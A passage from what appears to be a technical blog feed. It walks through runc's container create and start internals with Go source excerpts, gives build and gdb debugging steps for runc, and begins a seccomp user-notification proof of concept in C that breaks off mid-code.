-->p.cmd.Start
-->p.sendConfig
</code></pre></div></div>
<p>The create process consists of three general steps, which I have separated with an empty line above.</p>
<p>The first is the preparation work; the code is mostly in 'utils_linux.go'. It includes the following:</p>
<ul>
<li>load the spec from config.json</li>
<li>create a container object using the factory pattern</li>
<li>create a runner and call runner.run</li>
</ul>
<p>The second is the runner.run process; the code is mostly in 'container_linux.go'. It includes the following:</p>
<ul>
<li>Call container.Start, entering the libcontainer layer</li>
<li>Call the internal function c.start, which creates a newParentProcess</li>
<li>Call parent.start</li>
</ul>
<p>The third is parent.start(); the code is in 'init.go' and 'nsenter.c'. It includes the following:</p>
<ul>
<li>p.cmd.Start creates a child process, which is 'runc init'.</li>
<li>The runc init process does a double clone and finally runs the process defined in config.json. This is an interesting process that I will analyze in a separate post.</li>
</ul>
<p>Ok, let’s dig into more of the code.</p>
<h3> prepare </h3>
<p>The following picture shows the preparation work.</p>
<p><img src="/assets/img/runcinternals2/1.png" alt="" /></p>
<p>‘startContainer’ calls setupSpec to get the spec from config.json, then calls ‘createContainer’ to get a new container object.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> func startContainer(context *cli.Context, action CtAct, criuOpts *libcontainer.CriuOpts) (int, error) {
if err := revisePidFile(context); err != nil {
return -1, err
}
spec, err := setupSpec(context)
...
container, err := createContainer(context, id, spec)
...
}
</code></pre></div></div>
<p>Linux has no built-in container concept; libcontainer uses a ‘linuxContainer’ struct to represent a container.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> type linuxContainer struct {
id string
root string
config *configs.Config
cgroupManager cgroups.Manager
intelRdtManager intelrdt.Manager
initPath string
initArgs []string
initProcess parentProcess
initProcessStartTime uint64
criuPath string
newuidmapPath string
newgidmapPath string
m sync.Mutex
criuVersion int
state containerState
created time.Time
fifo *os.File
}
</code></pre></div></div>
<p>As we can see, there are several container-related fields. ‘initPath’ specifies the init program for spawning a container, and ‘initProcess’ is the process representation of that init program.</p>
<p>A linuxContainer is created by a ‘LinuxFactory’. createContainer is easy to follow: it first creates a libcontainer config, then creates a LinuxFactory (by calling loadFactory), and finally creates a linuxContainer (by calling factory.Create).</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> func createContainer(context *cli.Context, id string, spec *specs.Spec) (libcontainer.Container, error) {
rootlessCg, err := shouldUseRootlessCgroupManager(context)
if err != nil {
return nil, err
}
config, err := specconv.CreateLibcontainerConfig(&specconv.CreateOpts{
CgroupName: id,
UseSystemdCgroup: context.GlobalBool("systemd-cgroup"),
NoPivotRoot: context.Bool("no-pivot"),
NoNewKeyring: context.Bool("no-new-keyring"),
Spec: spec,
RootlessEUID: os.Geteuid() != 0,
RootlessCgroups: rootlessCg,
})
if err != nil {
return nil, err
}
factory, err := loadFactory(context)
if err != nil {
return nil, err
}
return factory.Create(id, config)
}
</code></pre></div></div>
<p>‘loadFactory’ calls ‘libcontainer.New’ to create a new factory. As we can see, ‘InitPath’ is set to the runc program itself and ‘InitArgs’ is set to ‘init’. Together this means ‘runc init’.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> func New(root string, options ...func(*LinuxFactory) error) (Factory, error) {
...
l := &LinuxFactory{
Root: root,
InitPath: "/proc/self/exe",
InitArgs: []string{os.Args[0], "init"},
Validator: validate.New(),
CriuPath: "criu",
}
...
}
</code></pre></div></div>
<p>After creating the factory, ‘createContainer’ calls ‘factory.Create’.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> func (l *LinuxFactory) Create(id string, config *configs.Config) (Container, error) {
...
cm, err := manager.New(config.Cgroups)
...
if err := os.MkdirAll(containerRoot, 0o711); err != nil {
return nil, err
}
if err := os.Chown(containerRoot, unix.Geteuid(), unix.Getegid()); err != nil {
return nil, err
}
c := &linuxContainer{
id: id,
root: containerRoot,
config: config,
initPath: l.InitPath,
initArgs: l.InitArgs,
criuPath: l.CriuPath,
newuidmapPath: l.NewuidmapPath,
newgidmapPath: l.NewgidmapPath,
cgroupManager: cm,
}
...
c.state = &stoppedState{c: c}
return c, nil
}
</code></pre></div></div>
<p>Notice that ‘initPath’ and ‘initArgs’ of linuxContainer are assigned from the LinuxFactory. ‘factory.Create’ also creates a directory as the container root. After creating the container, ‘startContainer’ creates a ‘runner’ and calls ‘r.run’.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> func startContainer(context *cli.Context, action CtAct, criuOpts *libcontainer.CriuOpts) (int, error) {
...
r := &runner{
enableSubreaper: !context.Bool("no-subreaper"),
shouldDestroy: !context.Bool("keep"),
container: container,
listenFDs: listenFDs,
notifySocket: notifySocket,
consoleSocket: context.String("console-socket"),
detach: context.Bool("detach"),
pidFile: context.String("pid-file"),
preserveFDs: context.Int("preserve-fds"),
action: action,
criuOpts: criuOpts,
init: true,
}
return r.run(spec.Process)
}
</code></pre></div></div>
<p>The runner object is, as its name indicates, a runner: it runs a process in a container. The ‘runner’ contains the ‘container’ and some other control options. The ‘action’ can be ‘CT_ACT_CREATE’, meaning just create, or ‘CT_ACT_RUN’, meaning create and run. ‘init’ decides whether the initialization work should be done; it is false when exec-ing a new process in an existing container.
The parameter of ‘r.run’ is ‘spec.Process’, the process defined in config.json that we need to execute.</p>
<p>Let’s go to ‘r.run’. ‘newProcess’ creates a new ‘libcontainer.Process’ object and ‘setupIO’ initializes the process’s IO.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> func (r *runner) run(config *specs.Process) (int, error) {
var err error
...
process, err := newProcess(*config)
...
// Populate the fields that come from runner.
process.Init = r.init
...
tty, err := setupIO(process, rootuid, rootgid, config.Terminal, detach, r.consoleSocket)
if err != nil {
return -1, err
}
defer tty.Close()
switch r.action {
case CT_ACT_CREATE:
err = r.container.Start(process)
case CT_ACT_RESTORE:
err = r.container.Restore(process, r.criuOpts)
case CT_ACT_RUN:
err = r.container.Run(process)
default:
panic("Unknown action")
}
...
return status, err
}
</code></pre></div></div>
<p>Finally, the function corresponding to ‘r.action’ is called; in the create case this is ‘r.container.Start’.</p>
<h3> container start </h3>
<p>The following picture shows the container start process.</p>
<p><img src="/assets/img/runcinternals2/2.png" alt="" /></p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> func (c *linuxContainer) Start(process *Process) error {
c.m.Lock()
defer c.m.Unlock()
if c.config.Cgroups.Resources.SkipDevices {
return errors.New("can't start container with SkipDevices set")
}
if process.Init {
if err := c.createExecFifo(); err != nil {
return err
}
}
if err := c.start(process); err != nil {
if process.Init {
c.deleteExecFifo()
}
return err
}
return nil
}
</code></pre></div></div>
<p>‘c.createExecFifo’ creates a fifo in the container directory; the default path is ‘/run/runc/&lt;container id&gt;/exec.fifo’.
Then we reach the internal start function. Most of the work of ‘start’ is creating a new parentProcess. A parentProcess, as its name indicates, is a process that launches the child process, i.e. the process defined in config.json. Why do we need a parentProcess? Because we can’t put a process into a container environment (separate namespaces, cgroup controls and so on) in one step; it needs several steps. ‘parentProcess’ is an interface in runc with two implementations, ‘setnsProcess’ and ‘initProcess’, used for the ‘runc exec’ and ‘runc create/run’ cases respectively.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> func (c *linuxContainer) start(process *Process) (retErr error) {
parent, err := c.newParentProcess(process)
...
if err := parent.start(); err != nil {
return fmt.Errorf("unable to start container process: %w", err)
}
...
}
</code></pre></div></div>
<p>The ‘initProcess’ is defined as follows:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> type initProcess struct {
cmd *exec.Cmd
messageSockPair filePair
logFilePair filePair
config *initConfig
manager cgroups.Manager
intelRdtManager intelrdt.Manager
container *linuxContainer
fds []string
process *Process
bootstrapData io.Reader
sharePidns bool
}
</code></pre></div></div>
<p>‘cmd’ holds the parent process’s program and args, ‘process’ is the process info defined in config.json, and ‘bootstrapData’ contains the data the parent sends to the child process.
Let’s see how the parentProcess is created.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> func (c *linuxContainer) newParentProcess(p *Process) (parentProcess, error) {
parentInitPipe, childInitPipe, err := utils.NewSockPair("init")
if err != nil {
return nil, fmt.Errorf("unable to create init pipe: %w", err)
}
messageSockPair := filePair{parentInitPipe, childInitPipe}
parentLogPipe, childLogPipe, err := os.Pipe()
if err != nil {
return nil, fmt.Errorf("unable to create log pipe: %w", err)
}
logFilePair := filePair{parentLogPipe, childLogPipe}
cmd := c.commandTemplate(p, childInitPipe, childLogPipe)
...
return c.newInitProcess(p, cmd, messageSockPair, logFilePair)
}
</code></pre></div></div>
<p>‘c.commandTemplate’ prepares the parentProcess’s command line. As we can see, the command is set to ‘c.initPath’ and ‘c.initArgs’, i.e. ‘runc init’. It also adds some environment variables to the parentProcess cmd; two fds, one for the init pipe and one for the log pipe, are passed to the child this way.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> func (c *linuxContainer) commandTemplate(p *Process, childInitPipe *os.File, childLogPipe *os.File) *exec.Cmd {
cmd := exec.Command(c.initPath, c.initArgs[1:]...)
cmd.Args[0] = c.initArgs[0]
cmd.Stdin = p.Stdin
cmd.Stdout = p.Stdout
cmd.Stderr = p.Stderr
cmd.Dir = c.config.Rootfs
if cmd.SysProcAttr == nil {
cmd.SysProcAttr = &unix.SysProcAttr{}
}
cmd.Env = append(cmd.Env, "GOMAXPROCS="+os.Getenv("GOMAXPROCS"))
cmd.ExtraFiles = append(cmd.ExtraFiles, p.ExtraFiles...)
if p.ConsoleSocket != nil {
cmd.ExtraFiles = append(cmd.ExtraFiles, p.ConsoleSocket)
cmd.Env = append(cmd.Env,
"_LIBCONTAINER_CONSOLE="+strconv.Itoa(stdioFdCount+len(cmd.ExtraFiles)-1),
)
}
cmd.ExtraFiles = append(cmd.ExtraFiles, childInitPipe)
cmd.Env = append(cmd.Env,
"_LIBCONTAINER_INITPIPE="+strconv.Itoa(stdioFdCount+len(cmd.ExtraFiles)-1),
"_LIBCONTAINER_STATEDIR="+c.root,
)
cmd.ExtraFiles = append(cmd.ExtraFiles, childLogPipe)
cmd.Env = append(cmd.Env,
"_LIBCONTAINER_LOGPIPE="+strconv.Itoa(stdioFdCount+len(cmd.ExtraFiles)-1),
"_LIBCONTAINER_LOGLEVEL="+p.LogLevel,
)
// NOTE: when running a container with no PID namespace and the parent process spawning the container is
// PID1 the pdeathsig is being delivered to the container's init process by the kernel for some reason
// even with the parent still running.
if c.config.ParentDeathSignal > 0 {
cmd.SysProcAttr.Pdeathsig = unix.Signal(c.config.ParentDeathSignal)
}
return cmd
}
</code></pre></div></div>
<p>After preparing the cmd, ‘newParentProcess’ calls ‘newInitProcess’ to create an ‘initProcess’ object. ‘newInitProcess’ also creates the bootstrap data, which contains the clone flags and the nsmaps derived from config.json; this defines which namespaces the config.json process will use.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> func (c *linuxContainer) newInitProcess(p *Process, cmd *exec.Cmd, messageSockPair, logFilePair filePair) (*initProcess, error) {
cmd.Env = append(cmd.Env, "_LIBCONTAINER_INITTYPE="+string(initStandard))
nsMaps := make(map[configs.NamespaceType]string)
for _, ns := range c.config.Namespaces {
if ns.Path != "" {
nsMaps[ns.Type] = ns.Path
}
}
_, sharePidns := nsMaps[configs.NEWPID]
data, err := c.bootstrapData(c.config.Namespaces.CloneFlags(), nsMaps, initStandard)
...
init := &initProcess{
cmd: cmd,
messageSockPair: messageSockPair,
logFilePair: logFilePair,
manager: c.cgroupManager,
intelRdtManager: c.intelRdtManager,
config: c.newInitConfig(p),
container: c,
process: p,
bootstrapData: data,
sharePidns: sharePidns,
}
c.initProcess = init
return init, nil
}
</code></pre></div></div>
<p>‘CloneFlags’ returns the clone flags parsed from config.json.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> func (n *Namespaces) CloneFlags() uintptr {
var flag int
for _, v := range *n {
if v.Path != "" {
continue
}
flag |= namespaceInfo[v.Type]
}
return uintptr(flag)
}
</code></pre></div></div>
<p>By default the following new namespaces are created:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> "namespaces": [
{
"type": "pid"
},
{
"type": "network"
},
{
"type": "ipc"
},
{
"type": "uts"
},
{
"type": "mount"
}
],
</code></pre></div></div>
<p>After creating a ‘parentProcess’, ‘parent.start()’ is called in the linuxContainer.start function to start the parent process. This function launches the init process by calling ‘p.cmd.Start()’.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> func (p *initProcess) start() (retErr error) {
defer p.messageSockPair.parent.Close() //nolint: errcheck
err := p.cmd.Start()
...
}
</code></pre></div></div>
<h3> parent start </h3>
<p>The following picture is a brief description of this phase.</p>
<p><img src="/assets/img/runcinternals2/3.png" alt="" /></p>
<p>‘p.cmd.Start()’ starts a new process, ‘runc init’. The handler of ‘init’ is in the ‘init.go’ file. Go is a high-level language, while the namespace setup is very low level and must happen before the Go runtime starts, so it can’t be done in Go code. That is why init.go imports the nsenter package.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> _ "github.com/opencontainers/runc/libcontainer/nsenter"
</code></pre></div></div>
<p>nsenter pkg contains cgo code as following:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> package nsenter
/*
#cgo CFLAGS: -Wall
extern void nsexec();
void __attribute__((constructor)) init(void) {
nsexec();
}
*/
import "C"
</code></pre></div></div>
<p>So nsexec will be executed first. The code is in ‘libcontainer/nsenter/nsexec.c’.
‘nsexec’ is a long function that I will discuss in another post. Here is just a summary of this parent process.
The ‘runc init’ parent process (named ‘runc:[0:PARENT]’) clones a new process named ‘runc:[1:CHILD]’. ‘runc:[1:CHILD]’ sets up the namespaces, but because a new pid namespace only takes effect in child processes, ‘runc:[1:CHILD]’ clones yet another process named ‘runc:[2:INIT]’. The original ‘runc create’ process does some synchronization work with these processes.</p>
<p>Now ‘runc:[2:INIT]’ is fully inside the new namespaces, and ‘init.go’ calls factory.StartInitialization to do the final initialization work and exec the process defined in config.json. ‘factory.StartInitialization’ creates a new ‘initer’ object; ‘initer’ is an interface and, not surprisingly, it has two implementations, one for ‘runc exec’ (linuxSetnsInit) and one for ‘runc create/run’ (linuxStandardInit). ‘StartInitialization’ finally calls ‘i.Init()’ to do the real initialization work.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> // StartInitialization loads a container by opening the pipe fd from the parent to read the configuration and state
// This is a low level implementation detail of the reexec and should not be consumed externally
func (l *LinuxFactory) StartInitialization() (err error) {
...
i, err := newContainerInit(it, pipe, consoleSocket, fifofd, logPipeFd, mountFds)
if err != nil {
return err
}
// If Init succeeds, syscall.Exec will not return, hence none of the defers will be called.
return i.Init()
}
</code></pre></div></div>
<p>Following is the main routine of Init(). Init’s work is mostly applying the configuration specified in config.json: setupNetwork, setupRoute, hostname, the apparmor profile, sysctl, readonly paths, seccomp and so on.
Notice that near the end of this function it opens the exec fifo, ‘/run/runc/&lt;container id&gt;/exec.fifo’, and writes data to it. As there is no reader for this fifo yet, the write blocks.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> func (l *linuxStandardInit) Init() error {
...
if err := setupNetwork(l.config); err != nil {
return err
}
if err := setupRoute(l.config.Config); err != nil {
return err
}
// initialises the labeling system
selinux.GetEnabled()
// We don't need the mountFds after prepareRootfs() nor if it fails.
err := prepareRootfs(l.pipe, l.config, l.mountFds)
...
if hostname := l.config.Config.Hostname; hostname != "" {
if err := unix.Sethostname([]byte(hostname)); err != nil {
return &os.SyscallError{Syscall: "sethostname", Err: err}
}
}
if err := apparmor.ApplyProfile(l.config.AppArmorProfile); err != nil {
return fmt.Errorf("unable to apply apparmor profile: %w", err)
}
for key, value := range l.config.Config.Sysctl {
if err := writeSystemProperty(key, value); err != nil {
return err
}
}
for _, path := range l.config.Config.ReadonlyPaths {
if err := readonlyPath(path); err != nil {
return fmt.Errorf("can't make %q read-only: %w", path, err)
}
}
for _, path := range l.config.Config.MaskPaths {
if err := maskPath(path, l.config.Config.MountLabel); err != nil {
return fmt.Errorf("can't mask path %s: %w", path, err)
}
}
pdeath, err := system.GetParentDeathSignal()
if err != nil {
return fmt.Errorf("can't get pdeath signal: %w", err)
}
if l.config.NoNewPrivileges {
...
if l.config.Config.Seccomp != nil && !l.config.NoNewPrivileges {
seccompFd, err := seccomp.InitSeccomp(l.config.Config.Seccomp)
if err != nil {
return err
}
if err := syncParentSeccomp(l.pipe, seccompFd); err != nil {
return err
}
}
if err := finalizeNamespace(l.config); err != nil {
return err
}
...
// Close the pipe to signal that we have completed our init.
logrus.Debugf("init: closing the pipe to signal completion")
_ = l.pipe.Close()
// Close the log pipe fd so the parent's ForwardLogs can exit.
if err := unix.Close(l.logFd); err != nil {
return &os.PathError{Op: "close log pipe", Path: "fd " + strconv.Itoa(l.logFd), Err: err}
}
// Wait for the FIFO to be opened on the other side before exec-ing the
// user process. We open it through /proc/self/fd/$fd, because the fd that
// was given to us was an O_PATH fd to the fifo itself. Linux allows us to
// re-open an O_PATH fd through /proc.
fifoPath := "/proc/self/fd/" + strconv.Itoa(l.fifoFd)
fd, err := unix.Open(fifoPath, unix.O_WRONLY|unix.O_CLOEXEC, 0)
if err != nil {
return &os.PathError{Op: "open exec fifo", Path: fifoPath, Err: err}
}
if _, err := unix.Write(fd, []byte("0")); err != nil {
return &os.PathError{Op: "write exec fifo", Path: fifoPath, Err: err}
}
// Close the O_PATH fifofd fd before exec because the kernel resets
// dumpable in the wrong order. This has been fixed in newer kernels, but
// we keep this to ensure CVE-2016-9962 doesn't re-emerge on older kernels.
// N.B. the core issue itself (passing dirfds to the host filesystem) has
// since been resolved.
// https://github.com/torvalds/linux/blob/v4.9/fs/exec.c#L1290-L1318
_ = unix.Close(l.fifoFd)
s := l.config.SpecState
s.Pid = unix.Getpid()
s.Status = specs.StateCreated
if err := l.config.Config.Hooks[configs.StartContainer].RunHooks(s); err != nil {
return err
}
return system.Exec(name, l.config.Args[0:], os.Environ())
}
</code></pre></div></div>
<p>For now, we can see the runc process is ‘./runc init’.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root@ubuntu:~/go/src# ps aux | grep runc
root 4239 0.0 0.2 1090192 10400 ? Ssl Dec26 0:00 ./runc init
root 10667 0.0 0.0 14432 1084 pts/0 S+ 05:19 0:00 grep --color=auto runc
root@ubuntu:~/go/src# cat /proc/4239/comm
runc:[2:INIT]
root@ubuntu:/run/runc/test# runc list
ID PID STATUS BUNDLE CREATED OWNER
test 4239 created /home/test/mycontainer 2021-12-25T05:17:30.596712553Z root
</code></pre></div></div>
<p>Now let’s execute ‘runc start test’. We can see the following:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root@ubuntu:/run/runc/test# runc start test
root@ubuntu:/run/runc/test# runc list
ID PID STATUS BUNDLE CREATED OWNER
test 4239 running /home/test/mycontainer 2021-12-25T05:17:30.596712553Z root
root@ubuntu:/run/runc/test# runc ps test
UID PID PPID C STIME TTY TIME CMD
root 4239 2709 0 Dec26 ? 00:00:00 sleep 1000
root@ubuntu:/run/runc/test# ls
state.json
</code></pre></div></div>
<p>‘runc start’ calls ‘getContainer’ to get a container object and then calls the container’s ‘Exec()’, which calls exec().</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> func (c *linuxContainer) exec() error {
path := filepath.Join(c.root, execFifoFilename)
pid := c.initProcess.pid()
blockingFifoOpenCh := awaitFifoOpen(path)
for {
select {
case result := <-blockingFifoOpenCh:
return handleFifoResult(result)
case <-time.After(time.Millisecond * 100):
stat, err := system.Stat(pid)
if err != nil || stat.State == system.Zombie {
// could be because process started, ran, and completed between our 100ms timeout and our system.Stat() check.
// see if the fifo exists and has data (with a non-blocking open, which will succeed if the writing process is complete).
if err := handleFifoResult(fifoOpen(path, false)); err != nil {
return errors.New("container process is already dead")
}
return nil
}
}
}
}
</code></pre></div></div>
<p>‘handleFifoResult’ reads data from the exec fifo, thus unblocking the ‘runc:[2:INIT]’ process, which finally executes the process defined in config.json.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> func handleFifoResult(result openResult) error {
if result.err != nil {
return result.err
}
f := result.file
defer f.Close()
if err := readFromExecFifo(f); err != nil {
return err
}
return os.Remove(f.Name())
}
</code></pre></div></div>
runc internals, part 1: usage, build and source architecture2021-12-22T00:00:00+00:00http://terenceli.github.io/%E6%8A%80%E6%9C%AF/2021/12/22/runc-internals-1
<p><a href="https://github.com/opencontainers/runc">runc</a> is the foundation of container technology. The idea of a container is simple: put some processes into separate namespaces, use cgroups to restrict those processes’ resource usage, and use overlayfs as the container’s filesystem. So it seems runc’s work is easy: just prepare the environment for the container process and run it. In reality, it is not so easy. This series will do a deep analysis of runc’s internals. This is the first part: how to use and build runc, and runc’s source code architecture.</p>
<h3> install Go </h3>
<p>Download the Go binary from <a href="https://go.dev/dl/">here</a>; we use ‘go1.17.5.linux-amd64.tar.gz’.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> wget https://go.dev/dl/go1.17.5.linux-amd64.tar.gz
</code></pre></div></div>
<p>Extract it to /usr/local:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> tar -C /usr/local -xzf go1.17.5.linux-amd64.tar.gz
</code></pre></div></div>
<p>Add the go binary to $PATH and set the GOPATH and GOROOT directories by adding the following lines to ~/.profile:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> export PATH=/usr/local/go/bin:$PATH
export GOROOT=/usr/local/go
export GOPATH=/home/test/go
</code></pre></div></div>
<p>Enable the setting:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> source ~/.profile
mkdir /home/test/go/bin
mkdir /home/test/go/src
mkdir /home/test/go/pkg
</code></pre></div></div>
<h3> build runc </h3>
<p>As the runc README.md says, first install the libseccomp-dev package:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> apt install libseccomp-dev
</code></pre></div></div>
<p>clone runc:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> mkdir /home/test/go/src/github.com/opencontainers
cd /home/test/go/src/github.com/opencontainers
git clone https://github.com/opencontainers/runc
cd runc
</code></pre></div></div>
<p>Change the following two lines of the runc Makefile, adding <b>-gcflags “-N -l”</b> (this disables optimizations and inlining, which makes debugging easier):</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> GO_BUILD := $(GO) build -trimpath $(GO_BUILDMODE) $(EXTRA_FLAGS) -tags "$(BUILDTAGS)" \
-ldflags "-X main.gitCommit=$(COMMIT) -X main.version=$(VERSION) $(EXTRA_LDFLAGS)" -gcflags "-N -l"
GO_BUILD_STATIC := CGO_ENABLED=1 $(GO) build -trimpath $(EXTRA_FLAGS) -tags "$(BUILDTAGS) netgo osusergo" \
-ldflags "-extldflags -static -X main.gitCommit=$(COMMIT) -X main.version=$(VERSION) $(EXTRA_LDFLAGS)" -gcflags "-N -l"
</code></pre></div></div>
<p>Build and install runc:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> make
make install
</code></pre></div></div>
<h3> runc usage </h3>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> # create the top most bundle directory
mkdir /mycontainer
cd /mycontainer
# create the rootfs directory
mkdir rootfs
# export busybox via Docker into the rootfs directory
docker export $(docker create busybox) | tar -C rootfs -xvf -
runc spec
runc run test
</code></pre></div></div>
<p>Now we have run a container.</p>
<p>Let’s debug runc. In order to let gdb find the source directory ‘github.com/opencontainers/runc/’, I copied the ‘runc’ binary to ‘/home/test/go/src’.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root@ubuntu:~/go/src# gdb --args ./runc run --bundle /home/test/mycontainer/ test
...
(gdb) b main.startContainer
Breakpoint 1 at 0x60d100: file github.com/opencontainers/runc/utils_linux.go, line 374.
(gdb) r
Starting program: /home/test/go/src/runc run --bundle /home/test/mycontainer/ test
....
Thread 1 "runc" hit Breakpoint 1, main.startContainer (context=0xc000144840, action=2 '\002', criuOpts=0x0, ~r3=824635577192, ~r4=...)
at github.com/opencontainers/runc/utils_linux.go:374
374 func startContainer(context *cli.Context, action CtAct, criuOpts *libcontainer.CriuOpts) (int, error) {
(gdb) n
375 if err := revisePidFile(context); err != nil {
(gdb) n
378 spec, err := setupSpec(context)
(gdb) n
379 if err != nil {
(gdb) p spec
$1 = (github.com/opencontainers/runtime-spec/specs-go.Spec *) 0xc000170380
(gdb) p *spec
$2 = {Version = 0xc0002067f0 "1.0.2-dev", Process = 0xc00020c000, Root = 0xc000127e90, Hostname = 0xc0002068b8 "runc", Mounts = {array = 0xc000184580,
len = 7, cap = 9}, Hooks = 0x0, Annotations = 0x0, Linux = 0xc00020c0f0, Solaris = 0x0, Windows = 0x0, VM = 0x0}
(gdb) p *spec.Process
$3 = {Terminal = true, ConsoleSize = 0x0, User = {UID = 0, GID = 0, Umask = 0x0, AdditionalGids = {array = 0x0, len = 0, cap = 0}, Username = 0x0 ""},
Args = {array = 0xc000149440, len = 1, cap = 4}, CommandLine = 0x0 "", Env = {array = 0xc000149480, len = 2, cap = 4}, Cwd = 0x5555561ba178 "/",
Capabilities = 0xc000170400, Rlimits = {array = 0xc000170480, len = 1, cap = 4}, NoNewPrivileges = true, ApparmorProfile = 0x0 "", OOMScoreAdj = 0x0,
SelinuxLabel = 0x0 ""}
(gdb)
</code></pre></div></div>
<h3> runc source architecture </h3>
<p>Following shows the source code architecture of runc</p>
<p><img src="/assets/img/runcinternals1/1.png" alt="" /></p>
<p>The runc binary has several subcommands; each handler is in a Go file in the root directory. The core code of runc is in the libcontainer directory. In the next post I will analyze the runc create and start commands.</p>
<h3> reference </h3>
<p><a href="https://yacanliu.gitee.io/runc-1.html">探索 runC (上)</a></p>
seccomp user notification2021-05-20T00:00:00+00:00http://terenceli.github.io/%E6%8A%80%E6%9C%AF/2021/05/20/seccomp-user-notify
<p>seccomp user notification defers seccomp decisions to userspace. The post <a href="https://brauner.github.io/2020/07/23/seccomp-notify.html">Seccomp Notify</a> has a very detailed description of this feature, and this <a href="https://man7.org/tlpi/code/online/dist/seccomp/seccomp_user_notification.c.html">page</a> has a seccomp example. I changed that example as follows: the seccomp BPF filter forwards the decision for the listen syscall to userspace, and the tracer prints the listened port and can block a specified port from being listened on. It is just a PoC and the program doesn’t exit normally.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> #define _GNU_SOURCE
#include <sys/types.h>
#include <sys/prctl.h>
#include <fcntl.h>
#include <limits.h>
#include <signal.h>
#include <sys/wait.h>
#include <stddef.h>
#include <stdbool.h>
#include <linux/audit.h>
#include <sys/syscall.h>
#include <sys/stat.h>
#include <linux/filter.h>
#include <linux/seccomp.h>
#include <sys/ioctl.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <errno.h>
#include <netinet/in.h>
#include "scm_functions.h"
#define errExit(msg) do { perror(msg); exit(EXIT_FAILURE); \
} while (0)
static int
seccomp(unsigned int operation, unsigned int flags, void *args)
{
return syscall(__NR_seccomp, operation, flags, args);
}
static int
pidfd_getfd(int pidfd, int targetfd, unsigned int flags)
{
return syscall(438, pidfd, targetfd, flags);
}
static int
pidfd_open(pid_t pid, unsigned int flags)
{
return syscall(__NR_pidfd_open, pid, flags);
}
#define X32_SYSCALL_BIT 0x40000000
#define X86_64_CHECK_ARCH_AND_LOAD_SYSCALL_NR \
BPF_STMT(BPF_LD | BPF_W | BPF_ABS, \
(offsetof(struct seccomp_data, arch))), \
BPF_JUMP(BPF_JMP | BPF_JEQ | BPF_K, AUDIT_ARCH_X86_64, 0, 2), \
BPF_STMT(BPF_LD | BPF_W | BPF_ABS, \
(offsetof(struct seccomp_data, nr))), \
BPF_JUMP(BPF_JMP | BPF_JGE | BPF_K, X32_SYSCALL_BIT, 0, 1), \
BPF_STMT(BPF_RET | BPF_K, SECCOMP_RET_KILL_PROCESS)
static int
installNotifyFilter(void)
{
struct sock_filter filter[] = {
X86_64_CHECK_ARCH_AND_LOAD_SYSCALL_NR,
/* listen() triggers notification to user-space tracer */
BPF_JUMP(BPF_JMP | BPF_JEQ | BPF_K, __NR_listen, 0, 1),
BPF_STMT(BPF_RET + BPF_K, SECCOMP_RET_USER_NOTIF),
/* Every other system call is allowed */
BPF_STMT(BPF_RET | BPF_K, SECCOMP_RET_ALLOW),
};
struct sock_fprog prog = {
.len = (unsigned short) (sizeof(filter) / sizeof(filter[0])),
.filter = filter,
};
int notifyFd = seccomp(SECCOMP_SET_MODE_FILTER,
SECCOMP_FILTER_FLAG_NEW_LISTENER, &prog);
if (notifyFd == -1)
errExit("seccomp-install-notify-filter");
return notifyFd;
}
static void
closeSocketPair(int sockPair[2])
{
if (close(sockPair[0]) == -1)
errExit("closeSocketPair-close-0");
if (close(sockPair[1]) == -1)
errExit("closeSocketPair-close-1");
}
static pid_t
targetProcess(int sockPair[2], char *argv[])
{
pid_t targetPid;
int notifyFd;
struct sigaction sa;
int s;
int sockfd;
struct sockaddr_in sockaddr;
targetPid = fork();
if (targetPid == -1)
errExit("fork");
if (targetPid > 0) /* In parent, return PID of child */
return targetPid;
printf("Target process: PID = %ld\n", (long) getpid());
